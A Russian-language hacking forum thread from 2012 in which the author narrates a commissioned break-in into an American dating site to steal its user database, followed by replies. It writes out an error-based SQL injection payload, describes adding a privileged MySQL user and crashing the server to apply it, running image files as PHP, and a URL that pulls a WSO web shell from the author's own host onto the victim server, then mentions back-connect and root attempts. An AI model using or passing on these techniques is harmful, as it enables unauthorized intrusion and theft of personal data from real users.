Авторские статьи От дорка до рута 2

Discussion in 'Статьи' started by Pirotexnik, 10 Apr 2012.

  1. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    INTRO

    Доброго времени суток!
    По немногочисленным просьбам решил написать ешё 1 статью/роман_хакреа/рассказ. Причина этому - накопившиеся в голове проблеммы и их решения, с которыми может столкнутся каждый.

    Сразу предупреждаю, что ничего критически нового тут нету, и если вы гуру, то вы врядли найдете сдесь что-то новое. Т.К. эта статья написана для таких же как и я сам. Для тех, кто учится.

    БЛАГОДАРНОСТИ

    BigBear - за все :)
    Га-Ноцри - дедик
    НАХТАЧЕК - хинты :)
    nikp - финт ушами с мускулом

    Пожалуй, погнали!

    СКУЛЬ

    Жертвой был какой-то американский дейтинг. Заказ - как обычно - бд с юзаками.
    Все как обычно, кинул в акунетикс, и сам пошел искать ручками. В этот раз я опередил софт, и нашел что-то странное. Как оказалось позднее, скуль была в ордере. Как юнионовская она не крутилась, хавидж начал крутить как time based (что не удивительно, т.к. у него на меня вообще аллергия :)), и крутить пришлось ручками.

    Вывод ошибки был, ну и понятно я попытался раскрутить как error based. Вышло вот что:

    PHP:
    id=(1)and(1=1)/**/(select/**/1/**/from(select/**/count(*),concat((select/**/(select/**/database())/**/from/**/information_schema.tables/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/**/and/**/1=1/**/--/**/
    Удивляло больше всего меня то, что конструкция and 1=1 помогала только при использование ДВАЖДЫ! Почему я так и не выяснил...

    Мне повезло, у моего юзера была возможность читать mysql.user, но file_priv был N. Спустя пару запросов, я извлек юзера с кривыми правами (чтение\запись по всей бд) и host=%

    Ближайший wso -> SQL -> connect -> УРА! Я внутри.

    Писать файлы я не мог, но мог редактировать mysql.user, что доставляло не мение. Я создал себе юзера, примитивным insert, с доступом откуда угодно, и полными правами. Но тут был облом... Зайти под ним я не мог, для этого требоволось применить изменения в силу. На команду
    прав не было, а сервер не перезагружался месяцами. И тут появился товарищь nikp и сказал:

    !ПОЛЕЗНЯШКА НОМЕР РАС!
    Мускул упал, и через 2 минуты самостоятельно ребутнулся. Ещё через 5-7 секунд у меня были рут права ;)

    ШЕЛЛ

    Наверное больше всего гемора доставила заливка шелла.
    Писать я мог, но незнал куда. Почитав ЭТО в пару запросов я извлек конфиг апача, ну а из него и путь. Но дало мне это не много, так как папка с правами 777 была одна, и в ней нельзя было запускать ничего как php.
    Ясное дело, после минуты раздумий я решил написать свой .htaccess (с блэк-джэком и шлюхами) в котором банально запускал бы .gif как php.

    Сказано - сделано, но опять облом. Обычный перенос строки превращался в "/".

    !ПОЛЕЗНЯШКА НОМЕР ДВАС!

    Записал в него я следубщее:


    Так, .htaccess записан, но не работает. Тупо игнорируется. Я перепробывал все варианты, подпапки с правами записи заканчивались, а мускулом файлы удалять нельзя, что делать я не знал...

    После пачки мальборо и 3 чашек какого-то кофе, какого не в курсе, мама принесла :D, я забил на это дело и решил как тру-гуру юзать низкоуровневые атаки на порт. Открыл nmap, воткнул IP, просканил... и... фак май моск!!!
    Понятное дело нгиникс плевал на мои .htaccess, т.к. эта фича чисто апачевская. Любимая опера понятно обращалась по 80 порту, и ответ мне выдавал нгиникс. Я попробывал следующее:

    !ПОЛЕЗНЯШКА НОМЕР ТРИС!

    target.com:81

    Сайт загрузился отлично.

    target.com:81/uploads/1/asd.gif

    И о чудо, вывелось ранее записаное мной в эту "картинку" echo. И phpinfo() тоже кстате вывелось :)

    target.com:81/wtf2.gif?a=copy("http://www.myserser.com/wso.txt","/home/target/public_html/uploads/1/wso.gif");

    Вобщем, все сработало. Я зашел в шелл.

    ШЕЛЛ

    Первым делом я глянул на ядро

    2010 год, вроде нормально. Бинд порт не сработал, тогда я отжал дедик, и зацепился бэк-коннектом. Но увы... Уже 10 сплоитов не помогли... Стоит там openSUSE 11.3 которя не хочет рутатся, не в какую... увы...

    Так что, если есть какие идеи по руту - мое пм открыто ;)
    Подробнее о проблемме тут

    Вот собственно и все. Оранжевым выделенны моменты, которые стоит запомнить, или записать.

    Всем спасибо, критика уместна.
    Pirotexnik
     
    #1 Pirotexnik, 10 Apr 2012
    Last edited: 10 Apr 2012
    7 people like this.
  2. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    733
    Likes Received:
    73
    Reputations:
    19
    что это???

    Про добавления юзверя интересно, не когда не задумывался, мб потомучто не занимаюсь этим.
     
  3. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Это metasploit и подобное.

    Добавление юзера тупо руками. Insert.
     
  4. Mr.Wekly

    Mr.Wekly New Member

    Joined:
    15 Sep 2011
    Messages:
    60
    Likes Received:
    3
    Reputations:
    5
    ОФФТОПИК сорри
    Можно ссылку на крякнутый акунетикс. Заранее благодарен.
     
  5. Mobile

    Mobile Elder - Старейшина

    Joined:
    18 Feb 2006
    Messages:
    1,089
    Likes Received:
    822
    Reputations:
    324
    Убедительная просьба, соблюдайте правила, не пишем бессмысленных постов, не оффтопим, не надо оценивать статью в посте, для этого есть "репутация".
     
  6. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Tigger, от дорка до рута - потому что продолжение, ну рут получить я собираюсь :)
    Сплоитов перепробовал уйму.
    А нащет портов - так дело не дошло просто :)
     
  7. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,185
    Likes Received:
    618
    Reputations:
    690
    Pirotexnik взорвал мой мозг)
    Ближайший wso -> SQL -> connect -> УРА! Я внутри.
    а это обязательно ближайшего соседа надо выбрать или на прямую тоже можно ? )
     
    _________________________
    1 person likes this.
  8. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Фиксер, я имелл ввиду любой шелл взял :) Ближайший, что был под рукой, а не к хосту ближайщий.
     
  9. asiaman

    asiaman New Member

    Joined:
    4 Aug 2011
    Messages:
    27
    Likes Received:
    2
    Reputations:
    0
    Статья не идеальна. Но очень хорошая. Автору респект.
    Например, запрос на крэш мускуля я не знал. Да и про связку backend тоже.

    От разных там гуру слышать вопросы, мол, там "низкоуровневое ... что такое". Смешно. Ладно бы новички спрашивали и им не понятно было. В общем ТС не воспринимай сильно близко критику.
     
  10. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Нет, разные гуру как-раз меня этому и научили. Просто подавляющее большинство используют то, что для нас ново и интересно как бытовую обыденность. Поэтому для того-же shell_c0de эта статья то же самое, что для нас утром проснутся :) Но действительно знающие люди забывают, что тоже когда-то этого не знали. Отсюда и недопонимания. Кто-то напишет "Спасибо много нового", потому, что ещё не разу не рутал, кто-то напишет "Ну и что тут нового? Это стандартные действия... ТС - лох!", потому, что за спиной 5-10 лет хека...

    Впринципе, я и сам злюсь, когда ко мне приходят сообщения типа "Как взломать сайт", хотя год назад я сам такое писал :) С опытом начинаешь считать приметивной обыденостью то, что узнал недавно.

    p.s. за синтаксис извиняйте, пойду я спать кароче :D
     
  11. t3cHn0iD

    t3cHn0iD Banned

    Joined:
    6 Apr 2009
    Messages:
    313
    Likes Received:
    63
    Reputations:
    66
    Мда.С таким знанием русского языка я бы сначала *****вал в учебники или ты укуренный настолько, что мозг не может воспроизводить слова грамотно, а руки печатают херню ?
    Хотя тут дохера кто допускает грамматические ошибки, но эти цеплялись в глаза сразу, поэтому статью читать было блевотно.
     
    #11 t3cHn0iD, 10 Apr 2012
    Last edited: 10 Apr 2012
  12. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Время написания посмотри :) После суток уже шкалит мозг, и руки пишут херню...

    Кстати, некоторые якобы ошибки - это стилистическое оформление.

    "РАС", "роман_хакера"
     
    #12 Pirotexnik, 10 Apr 2012
    Last edited: 10 Apr 2012
  13. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    аля ДневничОк кул хакИра удался ;)
     
    1 person likes this.
  14. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Я много полезного тут написал, ты сам про краш мускула не знал, уеба)
     
  15. sasha.seven

    sasha.seven Banned

    Joined:
    4 Jun 2011
    Messages:
    45
    Likes Received:
    6
    Reputations:
    1
    Все просто и понятно, вот только рута я так понял, ты и на данный момент не получил ?
     
  16. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Круто. Спасибо. Многому научился!
     
  17. stfox

    stfox New Member

    Joined:
    30 Aug 2011
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    вводите в заблуждение, а данной конфигурации, Nginx работает как проксирующий сервер, но здесь было исключение именно на эту папку. Nginx не "плюет" на htacess, он передает выполенние апачу, но в данном случае, у вас стояло правило для конкретной папки.
     
  18. Pro100nyb

    Pro100nyb Member

    Joined:
    4 Nov 2011
    Messages:
    297
    Likes Received:
    5
    Reputations:
    0
    И снова мне пришла по вкусу твоя "статья", продолжай в том же духе ;)
     
  19. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    stfox, хмм, спасибо!
     
  20. Mobile

    Mobile Elder - Старейшина

    Joined:
    18 Feb 2006
    Messages:
    1,089
    Likes Received:
    822
    Reputations:
    324
    Предеупреждение

    Господа хорошие! Все ваши посты типа "Круто. Спасибо. Многому научился!", "И снова мне пришла по вкусу твоя "статья", продолжай в том же духе" итп...
    Это все нарушение правил, фактически вы себе такими сообщениями набиваете количество постов. Прошу потереть подобные посты и в дальнейшем чтоб такого не было. Пишем только по теме. В случае игнорирования данного предупреждения - бан от одного дня.

    Данный пост не надо комментировать и тут обсуждать.
     
    #20 Mobile, 16 Apr 2012
    Last edited: 16 Apr 2012
    5 people like this.